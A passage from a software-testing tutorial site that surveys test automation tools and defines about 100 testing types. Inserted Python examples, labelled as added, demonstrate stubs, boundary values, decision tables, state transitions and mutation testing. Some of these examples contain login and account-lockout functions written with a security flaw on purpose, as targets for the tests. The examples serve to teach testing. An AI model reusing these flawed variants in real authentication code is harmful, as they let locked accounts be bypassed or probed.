mobile, and web trusted by over 4,000 companies worldwide. The
application offers codeless test automation, enabling beginners to test
straight away, as well as a complete IDE to give experts the power
they need.

Features:
• Reliable object identification, even for web elements with
dynamic IDs.
• Shareable object repository.
• Reduce test maintenance with reusable code modules.
• Cross-platform and cross-browser testing.
• Test in parallel or distribute on a Selenium Grid with built-in
Selenium WebDriver.
• Customizable, easy-to-read test reports.
• Enable video reporting to see what caused a test to fail without
re-running the test.
• Integrates with a complete testing toolchain: Azure DevOps,
Jira, Jenkins, TestRail, Git, and more.
Official Link: Ranorex
5. LambdaTest:

LambdaTest is a Cross Browser Testing Cloud that allows developers
and testers to perform Cross Browser Testing on 2000+ real browsers
and operating systems online in varying screen resolutions.
LambdaTest allows us to test on the latest mobile and desktop
browsers on the cloud. We can ensure our website is compatible across
all browsers and devices by performing real-time cross browser
compatibility testing with LambdaTest. We can choose from a wide
range of updated Android and iOS mobile devices and from the latest
to the oldest versions of Chrome, Firefox, Safari, Edge, Internet
Explorer, Opera, and Yandex. It also allows us to test for
responsiveness and take full-page automated screenshots. Supported
platforms are Windows, Android, iPhone/iPad, Mac, and Web-based.
Features:
• Online Browser Compatibility Testing.
• 2000+ real browsers and operating systems online in varying
screen resolutions.
• Faster Automated Screenshots / Screenshot testing.
• Check Responsiveness on All Screen Sizes.
• Seamless Collaboration and Testing.
• Testing Locally Hosted Pages.
• Smart Visual Regression Testing.
• Resolution Display Testing. Screen resolutions ranging from
800×600 to 2560×1440 are available.
• LambdaTest Inbuilt Issue Tracker.
Free Trial: Lifetime free (1 concurrent session – 5 users)
Pricing: $15/mo for an annual plan and $19/mo for a monthly plan
Official Link: LambdaTest
Check out our review on LambdaTest Cross Browser Testing Tool
6. Katalon Studio

Katalon Studio is a powerful test automation solution for web
applications, mobile, and web services. Being built on top of the
Selenium and Appium frameworks, Katalon Studio takes advantage of
these solutions for integrated software automation.
The tool supports different levels of testing skill sets. Non-programmers
can find it easy to start an automation testing project (like using Object
Spy to record test scripts) while programmers and advanced
automation testers can save the time of building new libraries and
maintaining their scripts.
Katalon Studio can be integrated into CI/CD processes and works well
with popular tools in the QA process including qTest, JIRA, Jenkins,
and Git. It offers a nice feature called Katalon Analytics which provides
users comprehensive views of test execution reports via dashboard
including metrics, charts, and graphs.
Website: Katalon Studio
License: Free
To learn Katalon, read our Katalon Studio Tutorial
7. UFT
Unified Functional Testing (UFT) is a well-known commercial testing
tool for functional testing. It provides a comprehensive feature set for
API, web services, and GUI testing of desktop, web, and mobile
applications across platforms. The tool has an advanced image-based
object recognition feature, reusable test components, and automated
documentation.
UFT uses Visual Basic Scripting Edition to register testing processes
and object control. UFT is integrated with Mercury Business Process
Testing and Mercury Quality Center. The tool supports CI via
integration with CI tools such as Jenkins.
Website: UFT
License: Commercial
8. Watir
Watir is an open-source testing tool for web automation testing based
on Ruby libraries. Watir supports cross-browser testing including
Firefox, Opera, headless browsers, and IE. It also supports data-driven
testing and integrates with BDD tools like RSpec, Cucumber, and
Test::Unit.
Website: Watir
License: Open-source
9. IBM Rational Functional Tester

IBM RFT is a data-driven testing platform for functional and regression
testing. It supports a wide range of applications such as .Net, Java,
SAP, Flex, and Ajax. RFT uses Visual Basic .Net and Java as
scripting languages. RFT has a unique feature called Storyboard
testing in which users’ actions on the AUT are recorded and visualized
in a storyboard format through application screenshots.
Another interesting feature of RFT is its integration with IBM Jazz
application lifecycle management systems such as IBM Rational Team
Concert and Rational Quality Manager.
Website: IBM RFT
License: Commercial
10. TestComplete
TestComplete by SmartBear is a powerful commercial testing tool for
web, mobile, and desktop testing. TestComplete supports various
scripting languages such as JavaScript, VBScript, Python, and
C++Script. Like Katalon Studio, testers can perform keyword-driven
and data-driven testing with TestComplete. The tool also offers an
easy-to-use record and playback feature.
Like UFT, TestComplete’s GUI object recognition capability can
automatically detect and update UI objects which helps reduce the
effort to maintain test scripts when the AUT is changed. It also
integrates with Jenkins in a CI process.
Website: TestComplete
License: Commercial
11. EggPlant (TestPlant)
An image-based automated functional testing tool that enables testers
to interact with the AUT the same way end users do. TestPlant eggPlant
is completely different from traditional testing tools in its approach: it
models the user’s point of view instead of the test-script view often
seen by testers. This allows testers with less programming skill to learn
and apply test automation intuitively. The tool supports various
platforms like Web, mobile, and POS systems. It offers lab
management and CI integration as well.
Website: EggPlant
License: Commercial
12. Tricentis Tosca
Tricentis Tosca is a model-based test automation tool that provides
quite a broad feature set for continuous testing including dashboards,
analytics, and integrations to support agile and DevOps
methodologies.
Tricentis Tosca helps users to optimize the reusability of test assets.
Like many other test automation tools, it supports a wide range of
technologies and applications such as web, mobile, and API. Tricentis
Tosca also has features for integration management, risk analysis,
and distributed execution.
Website: Tricentis Tosca
License: Commercial
13. Robot Framework
Robot Framework is an open-source automation framework that
implements the keyword-driven approach for acceptance testing and
acceptance test-driven development (ATDD). Robot Framework
provides frameworks for different test automation needs, and its test
capability can be further extended by implementing additional test
libraries using Python and Java. Selenium WebDriver is a popular
external library used in Robot Framework.
Test engineers can leverage Robot Framework as an automation
framework not only for web testing but also for Android and iOS test
automation. Robot Framework can be easy to learn for testers who
are familiar with keyword-driven testing.
Website: Robot Framework
License: Open-source
As we can see, each of these automation tools has unique features to
offer in addressing the growing challenges of software automation in
the years ahead. Most provide capabilities for continuous testing and
integration, test management, and reporting. They all support
increasing automation needs for Web and Mobile testing. However,
intelligent testing and smart analytics for adaptive and heterogeneous
environments are still something to be desired for automation tools.

Here I have hand-picked a few posts which will help you to learn more
about Software Testing.
• Best Bug Tracking Tools
• Best API Testing Tools
• Popular Test Management Tools
• Test Strategy Document – A Complete Guide
• How To Prepare A Test Plan
• Test Case Template with Detailed Explanation
• Explain Test Automation Framework
• Why You Choose Software Testing As A Career
• Manual Testing Tutorial
• Selenium Tutorial
If you have any more questions, feel free to ask via comments. If you
find this post useful, do share it with your friends on Social
Networking.

Disclaimer: The order of tools doesn’t suggest any recommendations.
You may choose any tool as per your requirements.
About The Author:
Katalon Studio is a simple and powerful automation solution built by
KMS Technology for testers everywhere. The tool provides
comparable features to popular commercial solutions whilst
eliminating the effort to build an automation framework from open
sources. Best of all, we’re committed to keeping Katalon Studio free.
Update: The above post was recently modified by the STM admin.

100+ Types of Software Testing – The Ultimate List | SoftwareTestingMaterial
The Ultimate List of 100+ Types of Software Testing
In this post ‘Types of Software Testing’, I would like to mention almost all
the software testing types in one place. One challenge to learning about
software testing is that there are many terms in the industry, and these
terms are often used inconsistently. While there are no universally accepted
definitions for all the testing terms, I think a good source to refer to is the
ISTQB Certified Tester Foundation Level Syllabus.
I would like to start with Software Testing before going to the actual
post, 100+ Software Test Types.

Software Testing: It is a process to evaluate the functionality of a
software application with the intent of finding whether the developed
software meets the specified requirements or not, and to identify
defects to ensure that the product is defect free in order to produce a
quality product. Read more on Software Testing Definitions &
Approaches.
The Ultimate list of Types of Testing:

Let’s see the different Types of Software Testing one by one.

1. Functional testing: In simple words, what the system actually does
is functional testing. It verifies that each function of the software
application behaves as specified in the requirement document, testing
all the functionalities by providing appropriate input to verify whether
the actual output matches the expected output or not. It falls within
the scope of black box testing and the testers need not be concerned
with the source code of the application.
2. Non-functional testing: In simple words, how well the system
performs is non-functional testing. Non-functional testing refers to
various aspects of the software such as performance, load, stress,
scalability, security, compatibility etc. The main focus is to improve the
user experience in terms of how fast the system responds to a request.
3. Manual testing: Manual testing is the process of testing the
software manually to find defects. A tester should have the
perspective of an end user and ensure all the features are working
as mentioned in the requirement document. In this process, testers
execute the test cases and generate the reports manually without
using any automation tools.
4. Automated testing: Automation testing is the process of testing the
software using an automation tool to find defects. In this process,
executing the test scripts and generating the results are performed
automatically by automation tools. Some of the most popular tools for
automation testing are HP QTP/UFT, Selenium WebDriver, etc.
Learn the Difference between Manual & Automated Testing here…
5. Black box testing: Black Box Testing is a software testing method
in which testers evaluate the functionality of the software under test
without looking at the internal code structure. This can be applied to
every level of software testing such as Unit, Integration, System and
Acceptance Testing.
Read more on black box testing here…
6. Glass box testing – Refer white box testing
7. White box testing: White Box Testing is also called Glass Box,
Clear Box, and Structural Testing. It is based on the application’s
internal code structure. In white-box testing, an internal perspective of
the system, as well as programming skills, are used to design test
cases. This testing is usually done at the unit level.
Click here for more details.
8. Specification-based testing: Refer black-box testing.
9. Structure-based testing: Refer white-box testing.
10. Gray box testing: Grey box is the combination of both White Box
and Black Box Testing. The tester who works on this type of testing
needs to have access to design documents. This helps to create
better test cases in this process.
11. Unit testing: Unit Testing is also called Module Testing or
Component Testing. It is done to check whether the individual unit or
module of the source code is working properly. It is done by the
developers in the developer’s environment.
12. Component testing: Refer Unit Testing
13. Module testing: Refer Unit Testing
14. Integration testing: Integration Testing is the process of testing
the interface between two software units. Integration testing is
done by multiple approaches such as the Big Bang Approach, Top-Down
Approach, Bottom-Up Approach, and Hybrid Integration approach.
Integration Testing Complete Guide
15. System testing: Testing the fully integrated application to
evaluate the system’s compliance with its specified requirements is
called System Testing, AKA End to End testing. It verifies the
completed system to ensure that the application works as intended.
16. Acceptance testing: It is also known as pre-production
testing. This is done by the end users along with the testers to
validate the functionality of the application. It is formal testing
conducted to determine whether an application has been developed as
per the requirements; its outcome allows the customer to accept or
reject the application. Types of acceptance testing are Alpha, Beta &
Gamma.
17. Big bang Integration Testing: Combining all the modules at once
and verifying the functionality after completion of individual module
testing.
Top down and bottom up are carried out by using dummy modules
known as Stubs and Drivers. These Stubs and Drivers are used to
stand-in for missing components to simulate data communication
between modules.

18. Top-down Integration Testing: Testing takes place from top to
bottom. High-level modules are tested first, then low-level modules,
and finally the low-level modules are integrated with the high-level
ones to ensure the system is working as intended. Stubs are used as
temporary modules if a module is not ready for integration testing.
19. Bottom-up Integration Testing: It is the reverse of the Top-Down
Approach. Testing takes place from bottom to top. The lowest-level
modules are tested first, then high-level modules, and finally the
high-level modules are integrated with the low-level ones to ensure
the system is working as intended. Drivers are used as temporary
modules for integration testing.
20. Hybrid Integration Testing: Hybrid integration testing is the
combination of both Top-down and bottom-up integration testing.
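Stubs and drivers side by side, as an added example that is not part of the original post. It assumes two constructed modules, UserStore (low level) and Registration (high level), and uses unittest.mock to build the stub.

```python
"""Stubs versus drivers in integration testing (added example, constructed).

UserStore is the low-level module and Registration the high-level module;
both are constructed for this illustration and not from any real project.
"""
from unittest.mock import Mock


class UserStore:
    """Low-level module: persists accounts and rejects duplicate emails."""

    def __init__(self):
        self._users = {}

    def add(self, email):
        key = email.strip().lower()   # normalise so Alice@X and alice@x collide
        if key in self._users:
            return False
        self._users[key] = "pending"
        return True

    def status(self, email):
        return self._users.get(email.strip().lower())


class Registration:
    """High-level module: validates the input, then delegates to the store."""

    def __init__(self, store):
        self.store = store

    def register(self, email):
        if "@" not in email:
            return "invalid email"
        return "registered" if self.store.add(email) else "already registered"


def top_down_check():
    """Top-down: Registration is real, UserStore is not yet integrated, so a
    stub stands in for it. The stub is scripted to report a duplicate and
    records the call so we can check Registration passed the email through."""
    stub = Mock(spec=UserStore)
    stub.add.return_value = False
    outcome = Registration(stub).register("Alice@Example.com")
    stub.add.assert_called_once_with("Alice@Example.com")
    return outcome


def bottom_up_driver():
    """Bottom-up: UserStore is real and Registration does not exist yet, so a
    driver issues the calls Registration will make later and returns what the
    store answered (normalisation and duplicate handling are under test)."""
    store = UserStore()
    return [
        store.add("alice@example.com"),
        store.add("  ALICE@example.com"),      # duplicate after normalisation
        store.status("Alice@Example.com"),
    ]


if __name__ == "__main__":
    print(top_down_check(), bottom_up_driver())
```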
21. Alpha testing: Alpha testing is done by the in-house developers
(who developed the software) and testers. Sometimes alpha testing is
done by the client or outsourcing team with the presence of
developers or testers.
22. Beta testing: Beta testing is done by a limited number of end
users before delivery. Usually, it is done in the client place.
23. Gamma Testing: Gamma testing is done when the software is
ready for release with specified requirements. It is done at the client
place. It is done directly by skipping all the in-house testing activities.
24. Equivalence partitioning testing: Equivalence Partitioning is also
known as Equivalence Class Partitioning. In equivalence partitioning,
inputs to the software or system are divided into groups that are
expected to exhibit similar behavior, so they are likely to be processed
in the same way. Hence one input from each group is selected to design
the test cases.
Read more on Equivalence Partitioning Testing Technique…
25. Boundary value analysis testing: Boundary value analysis
(BVA) is based on testing the boundary values of valid and invalid
partitions. The behavior at the edge of each equivalence partition is
more likely to be incorrect than the behavior within the partition, so
boundaries are an area where testing is likely to yield defects. Every
partition has its maximum and minimum values, and these maximum
and minimum values are the boundary values of a partition. A
boundary value for a valid partition is a valid boundary value. Similarly,
a boundary value for an invalid partition is an invalid boundary value.
Read more on Boundary Value Analysis Testing Technique…
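The two techniques above applied to one registration-form attribute, the length of a password, as an added example that is not part of the original page. The 8..64 length rule, both validators and the partition layout are assumptions; the example shows why the partition representatives alone miss an off-by-one defect that the boundary values catch.

```python
"""Equivalence partitioning and boundary value analysis applied to one
input attribute: the length of a password on a registration form.

Added example, not code from the original page. The 8..64 length rule,
the validators and the partition layout are assumptions.
"""
from typing import Callable, Dict, List, Tuple


def password_length_ok(pw: str) -> bool:
    """Assumed rule: accept only when 8 <= len(pw) <= 64 (correct version)."""
    return 8 <= len(pw) <= 64


def password_length_off_by_one(pw: str) -> bool:
    """Defective version: rejects the lower boundary (length 8) by mistake."""
    return 8 < len(pw) <= 64


def partitions(lo: int, hi: int) -> Dict[str, Tuple[int, int]]:
    """Split the length axis into one valid and two invalid equivalence
    classes. The 'above' class is open-ended; it is capped only so that a
    representative can be chosen from it."""
    return {
        "invalid_below": (0, lo - 1),
        "valid": (lo, hi),
        "invalid_above": (hi + 1, hi + 1000),
    }


def ep_cases(lo: int, hi: int) -> Dict[int, bool]:
    """Equivalence partitioning: one representative (the midpoint) per
    class, with its expected verdict. Returns {length: expected_valid}."""
    cases = {}
    for name, (low, high) in partitions(lo, hi).items():
        cases[(low + high) // 2] = name == "valid"
    return cases


def bva_cases(lo: int, hi: int) -> Dict[int, bool]:
    """Boundary value analysis: each boundary of the valid class plus its
    neighbours on both sides. Returns {length: expected_valid}."""
    return {lo - 1: False, lo: True, lo + 1: True,
            hi - 1: True, hi: True, hi + 1: False}


def run_cases(validator: Callable[[str], bool], cases: Dict[int, bool]) -> List[int]:
    """Feed a constructed password of each length to the validator and
    return the lengths whose verdict disagrees with the expectation."""
    failures = []
    for length, expected in cases.items():
        candidate = "a" * length  # constructed input of the required length
        if validator(candidate) != expected:
            failures.append(length)
    return failures


if __name__ == "__main__":
    for name, validator in (("correct", password_length_ok),
                            ("off-by-one", password_length_off_by_one)):
        print(name, "EP failures:", run_cases(validator, ep_cases(8, 64)),
              "BVA failures:", run_cases(validator, bva_cases(8, 64)))
```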
26. Decision tables testing: A Decision Table is also known as a
Cause-Effect Table. This test technique is appropriate for
functionalities that have logical relationships between inputs (if-else
logic). In the Decision Table technique, we deal with combinations of
inputs. To identify the test cases with a decision table, we consider
conditions and actions: conditions are taken as inputs and actions as
outputs.
Read more on Decision Table Testing Technique…
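A decision table for a login rule, built and executed in code, as an added example that is not part of the original page. The three conditions, the user store and both login() implementations are assumptions; the table has 2**3 rules, and each rule becomes one test case.

```python
"""Decision-table testing of a login rule: three conditions give 2**3
rules, each naming the one expected action, and each rule becomes a test.

Added example, not code from the original page. The conditions, the
user store and both login() implementations are assumptions.
"""
import itertools
from typing import Callable, Dict, List, Tuple

CONDITIONS = ("user_exists", "password_correct", "account_locked")


def expected_action(user_exists: bool, password_correct: bool,
                    account_locked: bool) -> str:
    """The decision table written as business rules (assumed for the example)."""
    if not user_exists:
        return "reject"     # remaining conditions are "don't care"
    if account_locked:
        return "locked"     # a locked account never opens, even with the right password
    return "login" if password_correct else "reject"


def build_decision_table() -> List[Tuple[Dict[str, bool], str]]:
    """Enumerate every combination of condition values with its action."""
    table = []
    for values in itertools.product((True, False), repeat=len(CONDITIONS)):
        conditions = dict(zip(CONDITIONS, values))
        table.append((conditions, expected_action(**conditions)))
    return table


# Systems under test (assumed implementations).
Users = Dict[str, Dict[str, object]]


def login(users: Users, username: str, password: str) -> str:
    user = users.get(username)
    if user is None:
        return "reject"
    if user["locked"]:
        return "locked"
    return "login" if user["password"] == password else "reject"


def login_lock_checked_late(users: Users, username: str, password: str) -> str:
    """Defective variant: the password is verified before the lock state, so
    a locked account still confirms whether a guessed password is right."""
    user = users.get(username)
    if user is None or user["password"] != password:
        return "reject"
    return "locked" if user["locked"] else "login"


def run_decision_table(sut: Callable[[Users, str, str], str]) -> List[Dict[str, bool]]:
    """Execute one test per rule and return the rules whose action was wrong."""
    failures = []
    for conditions, action in build_decision_table():
        # Constructed fixture that realises exactly this rule's conditions.
        users = {"alice": {"password": "correct horse",
                           "locked": conditions["account_locked"]}}
        username = "alice" if conditions["user_exists"] else "nobody"
        password = "correct horse" if conditions["password_correct"] else "wrong"
        if sut(users, username, password) != action:
            failures.append(conditions)
    return failures
```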
27. Cause-effect graph testing– Refer Decision Table Testing
28. State transition testing: Using state transition testing, we pick
test cases from an application where we need to test different system
transitions. We can apply this when an application gives a different
output for the same input, depending on what has happened in the
earlier state.
Read more on State Transition Test Design Technique…
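State transition testing of an account lockout rule, as an added example that is not part of the original page: the same event ("good" password) yields "granted" or "locked" depending on what happened earlier. The lockout policy (lock after 3 failures, unlock by reset), the transition model and both Account classes are assumptions.

```python
"""State transition testing of an account lockout rule: the same event
gives a different output depending on what happened earlier.
Added example, not code from the page; the policy (lock after 3
failures, unlock by reset) and the Account classes are assumptions."""
from typing import Callable, List, Set, Tuple

MAX_FAILURES = 3  # assumed policy: the third consecutive failure locks the account

# Test model. States: "active:<n>" (n consecutive failures) or "locked".
# Events: "good" (correct password), "bad" (wrong password), "reset".
def model_transition(state: str, event: str) -> Tuple[str, str]:
    """Return (next_state, expected_output) for one transition."""
    if event == "reset":
        return "active:0", "unlocked"
    if state == "locked":
        return "locked", "locked"  # stays locked even for a correct password
    failures = int(state.split(":")[1])
    if event == "good":
        return "active:0", "granted"
    failures += 1
    if failures >= MAX_FAILURES:
        return "locked", "locked"
    return f"active:{failures}", "denied"

def expected_outputs(events: List[str]) -> List[str]:
    """Walk the model through an event sequence and collect its outputs."""
    state, outputs = "active:0", []
    for event in events:
        state, out = model_transition(state, event)
        outputs.append(out)
    return outputs

def covered_transitions(sequences: List[List[str]]) -> Set[Tuple[str, str]]:
    """(state, event) pairs the sequences exercise: a transition coverage measure."""
    covered = set()
    for events in sequences:
        state = "active:0"
        for event in events:
            covered.add((state, event))
            state, _ = model_transition(state, event)
    return covered

# Systems under test (assumed implementations).
class Account:
    def __init__(self) -> None:
        self.failures, self.locked = 0, False

    def handle(self, event: str) -> str:
        if event == "reset":
            self.failures, self.locked = 0, False
            return "unlocked"
        if self.locked:
            return "locked"
        if event == "good":
            self.failures = 0
            return "granted"
        self.failures += 1
        if self.failures >= MAX_FAILURES:
            self.locked = True
            return "locked"
        return "denied"

class AccountWithBypass(Account):
    """Defective variant: a correct password is accepted before the lock state is consulted."""
    def handle(self, event: str) -> str:
        if event == "good":
            self.failures = 0
            return "granted"
        return super().handle(event)

def first_divergence(make_sut: Callable[[], Account], events: List[str]) -> int:
    """Index of the first event where the SUT's output differs from the model, or -1."""
    sut = make_sut()
    for i, (event, want) in enumerate(zip(events, expected_outputs(events))):
        if sut.handle(event) != want:
            return i
    return -1

SEQUENCES = [["bad", "bad", "good", "bad"],  # constructed test sequences
             ["bad", "bad", "bad", "good", "reset", "good"],  # reaches "locked"
             ["good", "reset", "bad"]]
```

Only the second sequence reaches the locked state and probes it with a correct password, which is the transition where the defective variant diverges from the model.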
29. Exhaustive Testing: Testing all the functionalities using all valid
and invalid inputs and preconditions is known as Exhaustive testing.
30. Early Testing: Defects detected in early phases of SDLC are less
expensive to fix. So conducting early testing reduces the cost of fixing
defects.
31. Use case testing: Use case testing is carried out with the help of
the use case document. It is done to identify test scenarios for
end-to-end testing.
32. Scenario testing: Scenario testing is a software testing technique
based on a scenario. It involves converting business requirements
into test scenarios for better understanding and to achieve end-to-end
testing. A well-designed scenario should be motivating, credible,
complex, and have an outcome that is easy to evaluate.
33. Documentation testing: Documentation testing is done to
validate the documented artifacts such as requirements, test plan,
traceability matrix, test cases.
34. Statement coverage testing: Statement coverage testing is a
white box testing technique that validates whether each and every
statement in the code is executed at least once.
35. Decision coverage testing/branch coverage testing: Decision
coverage or branch coverage testing is a white box testing technique
that validates that every possible branch is executed at least once.
36. Path testing: Path coverage testing is a white box testing
technique that validates that all the paths of the program are
executed at least once.
37. Mutation testing: Mutation testing is a type of white box testing
in which certain statements in the source code are changed (mutated)
to verify whether the tests are able to detect the errors.
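Mutation testing in miniature, as an added example that is not part of the original page: each relational operator in the function under test is flipped to its neighbour, the suite is re-run against the mutant, and the mutant is killed or survives. The function under test, the operator table and both constructed suites are assumptions; a suite that never probes the boundaries lets both mutants survive.

```python
"""Mutation testing in miniature: each relational operator in the function
under test is flipped (<= becomes <, and so on), the test suite is re-run
against the mutant, and the mutant is "killed" if any test fails or
"survives" if none does.

Added example, not code from the original page. The function under
test, the operator table and both test suites are assumptions.
"""
import ast
from typing import Callable, Dict, List, Optional

SOURCE = '''
def within_limit(length, lo, hi):
    """Assumed rule: accept when lo <= length <= hi."""
    return lo <= length and length <= hi
'''

# Operator substitutions that model off-by-one mistakes.
MUTATIONS = {ast.LtE: ast.Lt, ast.Lt: ast.LtE, ast.GtE: ast.Gt, ast.Gt: ast.GtE}


class FlipOneOperator(ast.NodeTransformer):
    """Replace only the comparison operator at position `target`, counting
    every operator of every Compare node in source order."""
    def __init__(self, target: int) -> None:
        self.target = target
        self.seen = 0
        self.applied = False

    def visit_Compare(self, node: ast.Compare) -> ast.AST:
        self.generic_visit(node)
        new_ops = []
        for op in node.ops:
            if self.seen == self.target and type(op) in MUTATIONS:
                new_ops.append(MUTATIONS[type(op)]())
                self.applied = True
            else:
                new_ops.append(op)
            self.seen += 1
        node.ops = new_ops
        return node


def count_operators(source: str) -> int:
    return sum(len(n.ops) for n in ast.walk(ast.parse(source)) if isinstance(n, ast.Compare))


def load(tree: ast.AST, name: str) -> Callable:
    """Compile a module AST and return the named function from it."""
    namespace: dict = {}
    exec(compile(ast.fix_missing_locations(tree), "<mutant>", "exec"), namespace)
    return namespace[name]


def make_mutant(source: str, name: str, target: int) -> Optional[Callable]:
    flipper = FlipOneOperator(target)
    tree = flipper.visit(ast.parse(source))
    return load(tree, name) if flipper.applied else None


def mutation_score(source: str, name: str,
                   tests: List[Callable[[Callable], bool]]) -> Dict[str, int]:
    """Run every test against every mutant; a mutant survives only if all tests pass."""
    original = load(ast.parse(source), name)
    assert all(test(original) for test in tests), "the suite must pass on the original"
    result = {"killed": 0, "survived": 0}
    for target in range(count_operators(source)):
        mutant = make_mutant(source, name, target)
        if mutant is None:
            continue  # operator with no entry in MUTATIONS
        result["survived" if all(t(mutant) for t in tests) else "killed"] += 1
    return result


# Two constructed suites: the first never probes the boundaries 8 and 64.
WEAK_SUITE = [
    lambda f: f(36, 8, 64) is True,
    lambda f: f(3, 8, 64) is False,
    lambda f: f(100, 8, 64) is False,
]
BOUNDARY_SUITE = WEAK_SUITE + [
    lambda f: f(8, 8, 64) is True,    # lower boundary
    lambda f: f(64, 8, 64) is True,   # upper boundary
    lambda f: f(7, 8, 64) is False,
    lambda f: f(65, 8, 64) is False,
]
```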
38. Loop testing: Loop testing is a white box testing technique that
validates the different kinds of loops, such as simple loops, nested
loops, concatenated loops and unstructured loops.
39. Performance testing: This type of testing determines or validates
the speed, scalability, and/or stability characteristics of the system or
application under test. Performance is concerned with achieving
response times, throughput, and resource-utilization levels that meet
the performance objectives for the project or product.
40. Load testing: It is to verify that the system/application can handle
the expected number of transactions and to verify the
system/application behavior under both normal and peak load
conditions.
41. Stress testing: It is to verify the behavior of the system once the
load increases more than its design expectations.
42. Soak testing: Running a system at high load for a prolonged
period of time to identify the performance problems is called Soak
Testing.
43. Endurance testing: Refer Soak testing
44. Stability testing: Refer Soak testing
45. Scalability Testing: Scalability testing is a type of non-functional
testing. It is to determine how the application under test scales with
increasing workload.
46. Volume testing: It is to verify that the system/application can
handle a large amount of data.
47. Robustness testing: Robustness testing is performed to validate
the robustness of the application, i.e., how well it keeps working when
given invalid or unexpected input or when placed under stress.
48. Vulnerability testing: Vulnerability testing is the process of
identifying the vulnerabilities or weaknesses in the application.
49. Adhoc testing: Ad-hoc testing is the opposite of formal
testing. It is an informal testing type. In ad-hoc testing, testers
randomly test the application without following any documents or test
design techniques, i.e., without any test cases or business
requirement document. This testing is primarily performed when the
testers' knowledge of the application under test is very high.
50. Exploratory testing: Usually, this process is carried out by
domain experts. They perform testing just by exploring the
functionalities of the application, without prior knowledge of the
requirements.
51. Retesting: Retesting is done to ensure that the defects found
and reported in an earlier build have been fixed in the current build.
Say Build 1.0 was released. The test team found some defects (Defect
Id 1.0.1, 1.0.2) and reported them. Build 1.1 was released; now
testing the defects 1.0.1 and 1.0.2 in this build is retesting.
52. Regression testing: Repeated testing of an already tested
program, after modification, to discover any defects introduced or
uncovered as a result of the changes in the software being tested or in
other related or unrelated software components.
53. Smoke testing: Smoke Testing is done to make sure that the build
received from the development team is testable. It is also called the
“Day 0” check. It is done at the “build level”. It avoids wasting
testing time on the whole application when the key features don’t
work or the key bugs have not been fixed yet.
54. Sanity testing: Sanity Testing is done during the release phase to
check the main functionalities of the application without going
deeper. It is also called a subset of Regression testing. It is done at
the “release level”. At times, due to release time constraints, rigorous
regression testing can’t be done on the build; sanity testing covers
that part by checking the main functionalities.
55. Dynamic testing: Dynamic testing involves the execution of
code. It validates the output against the expected outcome.
56. Static testing: Static Testing involves reviewing the documents
to identify defects in the early stages of the SDLC.
57. Monkey testing: Perform abnormal actions on the application
deliberately in order to verify the stability of the application.
58. Gorilla testing: Gorilla testing is done by testers; sometimes
developers also join hands with the testers. It involves testing a
system repeatedly to test its robustness.
59. Usability testing: To verify whether the application is user-friendly
and can be used comfortably by an end user. The main focus in this
testing is to check whether the end user can understand and operate
the application easily. An application should be self-explanatory and
must not require training to operate it.
60. Accessibility testing: Accessibility testing is a subset of usability
testing. It aims to discover how easily people with disabilities (such as
visual, physical, hearing, cognitive or learning impairments) can use a
system.
61. Compatibility testing: It is to deploy and check whether the
application works as expected in different combinations of
environmental components.
62. Configuration testing: Configuration testing is the process of
testing an application with each one of the supported hardware and
software configurations to find out whether the application can work
without any issues.
63. Localization testing: Localization is the process of adapting
globalized software for a specific region or language by adding
locale-specific components.
64. Globalization testing: Globalization is a process of designing a
software application so that it can be adapted to various languages
and regions without any changes.
65. Internationalization testing– Refer Globalization testing
66. Positive Testing: It is to determine what the system is supposed
to do. It helps to check whether the application meets the
requirements.
67. Negative testing: It is to determine what the system is not
supposed to do. It helps to find defects in the software.
68. Security testing: Security testing is a process to determine
whether the system protects data and maintains functionality as
intended.
Security Testing Complete Guide
69. Penetration testing: Penetration testing is also known as pen
testing. It is a type of security testing. It is performed to evaluate the
security of the system.
Penetration Testing Complete Guide
70. Database testing: Database testing is done to validate that the
data shown in the UI matches the data stored in the database. It
involves checking the schema, tables, triggers, etc., of the database.
71. Bucket Testing: Bucket testing is a method to compare two
versions of an application against each other to determine which one
performs better.
72. A/B testing: Refer Bucket Testing…
73. Split testing– Refer bucket testing…
74. Reliability Testing: Perform testing on the application
continuously for a long period of time in order to verify the stability of
the application.
75. Interface Testing: Interface testing is performed to evaluate
whether two intended modules pass data and communicate correctly
to one another.
76. Concurrency testing: Concurrency testing means accessing the
application at the same time by multiple users to ensure the stability of
the system. This is mainly used to identify deadlock issues.
77. Fuzz testing: Fuzz testing is used to identify coding errors and
security loopholes in an application by feeding a massive amount of
random data into the system in an attempt to make it crash, thereby
identifying whether anything breaks in the application.
78. GUI Testing: Graphical User Interface Testing tests the
interface between the application and the end user. Testers are
mainly concerned with whether the appearance of the elements, such
as fonts and colors, conforms to the design specifications.
79. API testing: API stands for Application Programming Interface.
API testing is a type of software testing that involves testing APIs
using tools such as SoapUI and Postman.
80. Agile testing: Agile testing is a type of testing that involves
following principles of agile software development methodology. In this
agile testing, testing is conducted throughout the lifecycle of the
continuously evolving project instead of being confined to a particular
phase.
81. End to end testing– Refer system testing…
82. Recovery testing: Recovery testing is performed in order to
determine how quickly the system can recover after a system crash
or hardware failure. It comes under the type of non-functional testing.
83. Risk-based testing: Identify the modules or functionalities that
are most likely to cause failures and then test those functionalities.
84. Installation testing: It is to check whether the application is
successfully installed and is working as expected after installation.
85. Formal Testing: It is a process where the testers test the
application using pre-planned procedures and proper
documentation.
86. Pilot testing: Pilot testing is testing carried out under real-time
operating conditions by the company in order to gain the confidence
of the client.
87. Backend testing: Refer Database testing…
88. Cross-browser testing: Cross Browser Testing is a type of non-
functional test which helps us to ensure that our website or web
application works as expected in various web browsers.
Read more on Cross Browser Testing…
89. Browser compatibility testing: Refer Cross-browser testing…
90. Forward compatibility testing: Forward compatibility testing is to
validate that the application under test works as intended with later
versions of the software than the current version.
91. Backward compatibility testing: Backward compatibility testing
is to validate that the application under test works as intended with
earlier versions of the software than the current version.
92. Downward compatibility testing: Refer Backward compatibility
testing…
93. Compliance testing: Compliance testing is non-functional testing
which is done to validate whether the software meets a defined set of
standards.
94. Conformance testing: Refer compliance testing…
95. UI testing: In UI testing, testers aim to test both GUI and
Command Line Interfaces (CLIs)
Also, refer GUI Testing…
96. Destructive testing: Destructive testing is a testing technique
that aims to validate the robustness of the application by continuing
testing until the application breaks.
97. Dependency testing: Dependency testing is a testing technique
which examines the requirements of an application for pre-conditions,
initial states, and configuration for the proper functioning of the
application.
98. Crowdsourced testing: Crowdsourced testing is carried out by a
community of expert quality assurance testers through an online
platform.
99. ETL testing: ETL (Extract, Transform and Load) testing involves
validating the data movement from source to destination, verifying the
data count in both source and destination, verifying the data
extraction and transformation, and also verifying the table relations.
100. Data warehouse testing: Refer ETL testing…
